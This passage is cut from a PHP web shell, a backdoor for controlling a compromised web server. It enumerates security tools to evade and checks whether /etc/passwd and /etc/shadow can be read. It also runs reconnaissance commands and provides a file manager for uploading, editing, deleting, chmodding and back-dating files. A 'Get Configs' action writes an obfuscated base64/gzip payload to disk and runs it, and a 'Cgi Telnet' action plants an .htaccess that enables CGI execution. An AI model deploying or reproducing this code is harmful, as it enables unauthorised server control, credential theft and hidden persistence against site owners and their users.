"bzip2",
"nc",
"locate",
"suidperl",
];
$danger = [
"kav",
"nod32",
"bdcored",
"uvscan",
"sav",
"drwebd",
"clamd",
"rkhunter",
"chkrootkit",
"iptables",
"ipfw",
"tripwire",
"shieldcc",
"portsentry",
"snort",
"ossec",
"lidsadm",
"tcplodg",
"sxid",
"logcheck",
"logwatch",
"sysmask",
"zmbscap",
"sawmill",
"wormscan",
"ninja",
];
$downloaders = [
"wget",
"fetch",
"lynx",
"links",
"curl",
"get",
"lwp-mirror",
];
showSecParam(
"Readable /etc/passwd",
@is_readable("/etc/passwd")
? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>"
: "no"
);
showSecParam(
"Readable /etc/shadow",
@is_readable("/etc/shadow")
? "yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>"
: "no"
);
showSecParam("OS version", @file_get_contents("/proc/version"));
showSecParam("Distr name", @file_get_contents("/etc/issue.net"));
if (!$GLOBALS["safe_mode"]) {
echo "<br>";
$temp = [];
foreach ($userful as $item) {
if (which($item)) {
$temp[] = $item;
}
}
showSecParam("Userful", implode(", ", $temp));
$temp = [];
foreach ($danger as $item) {
if (which($item)) {
$temp[] = $item;
}
}
showSecParam("Danger", implode(", ", $temp));
$temp = [];
foreach ($downloaders as $item) {
if (which($item)) {
$temp[] = $item;
}
}
showSecParam("Downloaders", implode(", ", $temp));
echo "<br/>";
showSecParam("Hosts", @file_get_contents("/etc/hosts"));
showSecParam("HDD space", ex("df -h"));
showSecParam("Mount options", @file_get_contents("/etc/fstab"));
}
} else {
showSecParam("OS Version", ex("ver"));
showSecParam("Account Settings", ex("net accounts"));
showSecParam("User Accounts", ex("net user"));
}
echo "</div>";
printFooter();
}
function actionFilesMan()
{
printHeader();
echo "<center><h1>File Manager</h1></center><div class=content>";
if (isset(${"_POST"}["p1"]) && ${"_POST"}["p1"] != "deface") {
switch (${"_POST"}["p1"]) {
case "uploadFile":
if (
!@move_uploaded_file(
$_FILES["f"]["tmp_name"],
$_FILES["f"]["name"]
)
) {
echo "Can't upload file!";
}
break;
break;
case "mkdir":
if (!@mkdir(${"_POST"}["p2"])) {
echo "Can't create new dir";
}
break;
case "delete":
function deleteDir($path)
{
$path = substr($path, -1) == "/" ? $path : $path . "/";
$dh = opendir($path);
while (($item = readdir($dh)) !== false) {
$item = $path . $item;
if (basename($item) == ".." || basename($item) == ".") {
continue;
}
$type = filetype($item);
if ($type == "dir") {
deleteDir($item);
} else {
@unlink($item);
}
}
closedir($dh);
rmdir($path);
}
if (is_array(@${"_POST"}["f"])) {
foreach (${"_POST"}["f"] as $f) {
$f = urldecode($f);
if (is_dir($f)) {
deleteDir($f);
} else {
@unlink($f);
}
};
}
break;
case "paste":
if ($_SESSION["act"] == "copy") {
function copy_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
mkdir($d . $s);
$h = opendir($c . $s);
while (($f = readdir($h)) !== false) {
if ($f != "." and $f != "..") {
copy_paste(
$c . $s . "/",
$f,
$d . $s . "/"
);
}
}
} elseif (is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_SESSION["f"] as $f) {
copy_paste($_SESSION["cwd"], $f, $GLOBALS["cwd"]);
}
} elseif ($_SESSION["act"] == "move") {
function move_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
mkdir($d . $s);
$h = opendir($c . $s);
while (($f = readdir($h)) !== false) {
if ($f != "." and $f != "..") {
copy_paste(
$c . $s . "/",
$f,
$d . $s . "/"
);
}
}
} elseif (is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_SESSION["f"] as $f) {
@rename($_SESSION["cwd"] . $f, $GLOBALS["cwd"] . $f);
}
}
unset($_SESSION["f"]);
break;
default:
if (
!empty(${"_POST"}["p1"]) &&
(${"_POST"}["p1"] == "copy" || ${"_POST"}["p1"] == "move")
) {
$_SESSION["act"] = @${"_POST"}["p1"];
$_SESSION["f"] = @${"_POST"}["f"];
foreach ($_SESSION["f"] as $k => $f) {
$_SESSION["f"][$k] = urldecode($f);
}
$_SESSION["cwd"] = @${"_POST"}["c"];
}
break;
}
echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
}
$dirContent = @scandir(isset(${"_POST"}["c"]) ? ${"_POST"}["c"] : $GLOBALS["cwd"]);
if ($dirContent === false) {
echo 'Can\'t open this folder!';
return;
}
global $sort;
$sort = ["name", 1];
if (!empty(${"_POST"}["p1"])) {
if (preg_match("!s_([A-z]+)_(\d{1})!", ${"_POST"}["p1"], $match)) {
$sort = [$match[1], (int) $match[2]];
}
}
echo '<script>
function sa() { for(i=0;i<document.files.elements.length;i++) if(document.files.elements[i].type == \'checkbox\') document.files.elements[i].checked = document.files.elements[0].checked;
}
</script> <table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>
<form name=files method=post>';
echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" .
($sort[1] ? 0 : 1) .
"\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" .
($sort[1] ? 0 : 1) .
"\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" .
($sort[1] ? 0 : 1) .
"\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" .
($sort[1] ? 0 : 1) .
"\")'>Permissions</a></th><th>Actions</th></tr>";
$dirs = $files = $links = [];
$n = count($dirContent);
for ($i = 0; $i < $n; $i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = [
"name" => $dirContent[$i],
"path" => $GLOBALS["cwd"] . $dirContent[$i],
"modify" => @date(
"Y-m-d H:i:s",
@filemtime($GLOBALS["cwd"] . $dirContent[$i])
),
"perms" => viewPermsColor($GLOBALS["cwd"] . $dirContent[$i]),
"size" => @filesize($GLOBALS["cwd"] . $dirContent[$i]),
"owner" => $ow["name"] ? $ow["name"] : @fileowner($dirContent[$i]),
"group" => $gr["name"] ? $gr["name"] : @filegroup($dirContent[$i]),
];
if (@is_file($GLOBALS["cwd"] . $dirContent[$i])) {
$files[] = array_merge($tmp, ["type" => "file"]);
} elseif (@is_link($GLOBALS["cwd"] . $dirContent[$i])) {
$links[] = array_merge($tmp, ["type" => "link"]);
} elseif (
@is_dir($GLOBALS["cwd"] . $dirContent[$i]) &&
$dirContent[$i] != "."
) {
$dirs[] = array_merge($tmp, ["type" => "dir"]);
}
}
$GLOBALS["sort"] = $sort;
function cmp($a, $b)
{
if ($GLOBALS["sort"][0] != "size") {
return strcmp($a[$GLOBALS["sort"][0]], $b[$GLOBALS["sort"][0]]) *
($GLOBALS["sort"][1] ? 1 : -1);
} else {
return ($a["size"] < $b["size"] ? -1 : 1) *
($GLOBALS["sort"][1] ? 1 : -1);
}
}
usort($files, "cmp");
usort($dirs, "cmp");
usort($links, "cmp");
$files = array_merge($dirs, $links, $files);
$l = 0;
foreach ($files as $f) {
echo "<tr" .
($l ? " class=l1" : "") .
'> <td><input type=checkbox name="f[]" value="' .
urlencode($f["name"]) .
'" class=chkbx></td> <td><a href=# onclick="' .
($f["type"] == "file"
? 'g(\'FilesTools\',null,\'' .
urlencode($f["name"]) .
'\', \'view\')">' .
htmlspecialchars($f["name"])
: 'g(\'FilesMan\',\'' .
$f["path"] .
'\');"><b>[ ' .
htmlspecialchars($f["name"]) .
" ]</b>") .
'</a> <a href=# onclick="' .
(preg_match('/\.(zip|ZIP)$/', $f["name"])
? 'g(\'FilesTools\',null,\'' .
urlencode($f["name"]) .
'\', \'unzip\')">' .
' <b style="background:green;text-shadow: 0px 0px 0px;">unzip</b>'
: 'g(\'FilesMan\',\'' . $f["path"] . '\');">') .
"</a></td> <td>" .
($f["type"] == "file" ? viewSize($f["size"]) : $f["type"]) .
"</td><td>" .
$f["modify"] .
"</td><td>" .
$f["owner"] .
"/" .
$f["group"] .
'</td><td><a href=# onclick="g(\'FilesTools\',null,\'' .
urlencode($f["name"]) .
'\',\'chmod\')">' .
$f["perms"] .
'</td><td><a href="#" onclick="g(\'FilesTools\',null,\'' .
urlencode($f["name"]) .
'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'' .
urlencode($f["name"]) .
'\', \'touch\')">T</a>' .
($f["type"] == "file"
? ' <a href="#" onclick="g(\'FilesTools\',null,\'' .
urlencode($f["name"]) .
'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'' .
urlencode($f["name"]) .
'\', \'download\')">D</a>'
: "") .
"</td></tr>";
$l = $l ? 0 : 1;
}
echo '<tr><td colspan=5> <input type=hidden name=a value=\'FilesMan\'> <input type=hidden name=c value="' .
htmlspecialchars($GLOBALS["cwd"]) .
'"> <input type=hidden name=charset value="' .
(isset(${"_POST"}["charset"]) ? ${"_POST"}["charset"] : "") .
'">
<select name=\'p1\' style=\'height:25px;\'><option value=\'delete\'>Delete</option><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option>';
if (!empty($_SESSION["act"]) && @count($_SESSION["f"])) {
echo '<option value=\'paste\'>Paste</option>';
}
echo '</select> <input type="submit" value=">>"></td></tr> </form></table></div>';
printFooter();
}
function actionFilesTools()
{
if (isset(${"_POST"}["p1"])) {
${"_POST"}["p1"] = urldecode(${"_POST"}["p1"]);
}
if (@${"_POST"}["p2"] == "download") {
if (is_file(${"_POST"}["p1"]) && is_readable(${"_POST"}["p1"])) {
ob_start("ob_gzhandler", 4096);
header(
"Content-Disposition: attachment; filename=" .
basename(${"_POST"}["p1"])
);
if (${"fexists"}("mime_content_type")) {
$type = @mime_content_type(${"_POST"}["p1"]);
header("Content-Type: " . $type);
}
$fp = @fopen(${"_POST"}["p1"], "r");
if ($fp) {
while (!@feof($fp)) {
echo @fread($fp, 1024);
}
fclose($fp);
}
} elseif (is_dir(${"_POST"}["p1"]) && is_readable(${"_POST"}["p1"])) {
}
exit();
}
if (@${"_POST"}["p2"] == "mkfile") {
if (!file_exists(${"_POST"}["p1"])) {
$fp = @fopen(${"_POST"}["p1"], "w");
if ($fp) {
${"_POST"}["p2"] = "edit";
fclose($fp);
}
}
}
printHeader();
echo "<h1>File Tools</h1><div class=content>";
if (!file_exists(@${"_POST"}["p1"])) {
echo "File not exists";
printFooter();
return;
}
$uid = @posix_getpwuid(@fileowner(${"_POST"}["p1"]));
$gid = @posix_getgrgid(@fileowner(${"_POST"}["p1"]));
echo "<span>Name:</span> " .
htmlspecialchars(${"_POST"}["p1"]) .
" <span>Size:</span> " .
(is_file(${"_POST"}["p1"]) ? viewSize(filesize(${"_POST"}["p1"])) : "-") .
" <span>Permission:</span> " .
viewPermsColor(${"_POST"}["p1"]) .
" <span>Owner/Group:</span> " .
$uid["name"] .
"/" .
$gid["name"] .
"<br>";
echo "<span>Create time:</span> " .
date("Y-m-d H:i:s", filectime(${"_POST"}["p1"])) .
" <span>Access time:</span> " .
date("Y-m-d H:i:s", fileatime(${"_POST"}["p1"])) .
" <span>Modify time:</span> " .
date("Y-m-d H:i:s", filemtime(${"_POST"}["p1"])) .
"<br><br>";
if (empty(${"_POST"}["p2"])) {
${"_POST"}["p2"] = "view";
}
if (is_file(${"_POST"}["p1"])) {
$m = [
"View",
"Highlight",
"Download",
"Hexdump",
"Edit",
"Chmod",
"Rename",
"Touch",
];
} else {
$m = ["Chmod", "Rename", "Touch"];
}
foreach ($m as $v) {
echo '<a href=# onclick="g(null,null,null,\'' .
strtolower($v) .
'\')">' .
(strtolower($v) == @${"_POST"}["p2"] ? "<b>[ " . $v . " ]</b>" : $v) .
"</a> ";
}
echo "<br><br>";
switch (${"_POST"}["p2"]) {
case "view":
echo "<pre class=ml1>";
$fp = @fopen(${"_POST"}["p1"], "r");
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
echo "</pre>";
break;
case "highlight":
if (is_readable(${"_POST"}["p1"])) {
echo '<div class=ml1 style="background-color: black;color:black;">';
$code = highlight_file(${"_POST"}["p1"], true);
echo str_replace(
["<span ", "</span>"],
["<font ", "</font>"],
$code
) . "</div>";
}
break;
case "chmod":
if (!empty(${"_POST"}["p3"])) {
$perms = 0;
for ($i = strlen(${"_POST"}["p3"]) - 1; $i >= 0; --$i) {
$perms +=
(int) ${"_POST"}["p3"][$i] *
pow(8, strlen(${"_POST"}["p3"]) - $i - 1);
}
if (!@chmod(${"_POST"}["p1"], $perms)) {
echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
} else {
die('<script>g(null,null,null,null,"")</script>');
}
}
echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="' .
substr(sprintf("%o", fileperms(${"_POST"}["p1"])), -4) .
'"><input type=submit value=">>"></form>';
break;
case "edit":
if (!is_writable(${"_POST"}["p1"])) {
echo 'File isn\'t writeable';
break;
}
if (!empty(${"_POST"}["p3"])) {
@file_put_contents(${"_POST"}["p1"], ${"_POST"}["p3"]);
echo 'Saved!<br><script>document.mf.p3.value="";</script>';
}
echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
$fp = @fopen(${"_POST"}["p1"], "r");
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
echo '</textarea><input type=submit value=">>"></form>';
break;
case "hexdump":
$c = @file_get_contents(${"_POST"}["p1"]);
$n = 0;
$h = ["00000000<br>", "", ""];
$len = strlen($c);
for ($i = 0; $i < $len; ++$i) {
$h[1] .= sprintf("%02X", ord($c[$i])) . " ";
switch (ord($c[$i])) {
case 0:
$h[2] .= " ";
break;
case 9:
$h[2] .= " ";
break;
case 10:
$h[2] .= " ";
break;
case 13:
$h[2] .= " ";
break;
default:
$h[2] .= $c[$i];
break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i + 1 < $len) {
$h[0] .= sprintf("%08X", $i + 1) . "<br>";
}
$h[1] .= "<br>";
$h[2] .= "
";
}
}
echo '<table cellspacing=1 cellpadding=5 bgcolor=#red><tr><td bgcolor=red><span style="font-weight: normal;"><pre>' .
$h[0] .
"</pre></span></td><td bgcolor=#red><pre>" .
$h[1] .
"</pre></td><td bgcolor=#red><pre>" .
htmlspecialchars($h[2]) .
"</pre></td></tr></table>";
break;
case "rename":
if (!empty(${"_POST"}["p3"])) {
if (!@rename(${"_POST"}["p1"], ${"_POST"}["p3"])) {
echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
} else {
die(
'<script>g(null,null,"' .
urlencode(${"_POST"}["p3"]) .
'",null,"")</script>'
);
}
}
echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="' .
htmlspecialchars(${"_POST"}["p1"]) .
'"><input type=submit value=">>"></form>';
break;
case "touch":
if (!empty(${"_POST"}["p3"])) {
$time = strtotime(${"_POST"}["p3"]);
if ($time) {
if (@touch(${"_POST"}["p1"], $time, $time)) {
die('<script>g(null,null,null,null,"")</script>');
} else {
echo 'Fail!<script>document.mf.p3.value="";</script>';
}
} else {
echo 'Bad time format!<script>document.mf.p3.value="";</script>';
}
}
echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="' .
date("Y-m-d H:i:s", @filemtime(${"_POST"}["p1"])) .
'"><input type=submit value=">>"></form>';
break;
case "mkfile":
break;
case "unzip":
if (preg_match('/\.(zip|ZIP)$/', ${"_POST"}["p1"])) {
$GLOBALS["status"] = [];
$zip = new ZipArchive();
if ($zip->open(${"_POST"}["p1"]) === true) {
$zip->extractTo(htmlspecialchars($GLOBALS["cwd"]));
$zip->close();
$GLOBALS["status"] = [
"success" =>
'<b style="font-size: 20px;background:green;text-shadow: 0px 0px;">File unzipped successfully</b>',
];
} else {
$GLOBALS["status"] = [
"error" =>
'<b style="font-size: 20px;background:red;text-shadow: 0px 0px;">Error unzipping file</b>',
];
}
}
echo "<center>";
echo reset($GLOBALS["status"]);
echo "<br/></p></center>";
break;
}
echo "</div>";
printFooter();
}
function actionconfigs()
{
printHeader();
echo "<center><h1>Get Configs</h1></center><div class=content>";
@ini_set("display_errors", 0);
$cgi_dir = mkdir("configs", 0755);
chdir("configs");
$file_mass = "config.php";
$mass_script =
"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";
$mass = fopen($file_mass, "w");
fwrite($mass, gzinflate(base64_decode($mass_script)));
echo "<center> <iframe src='configs/config.php' width='900' frameborder='0' height='480'></iframe></a>";
echo "</div>";
printFooter();
}
function actionSafeMode()
{
printHeader();
echo "<center><h1>Cgi Telnet</h1><div class=content><center>";
$cgi_dir = mkdir("telnet", 0755);
chdir("telnet");
$file_cgi = "cgi.new";
$memeg = ".htaccess";
$isi_htcgi =
"OPTIONS Indexes Includes ExecCGI FollowSymLinks
AddType application/x-httpd-cgi .new
AddHandler cgi-script .new
AddHandler cgi-script .new";
$htcgi = fopen(".htaccess", "w");
fwrite($htcgi, $isi_htcgi);
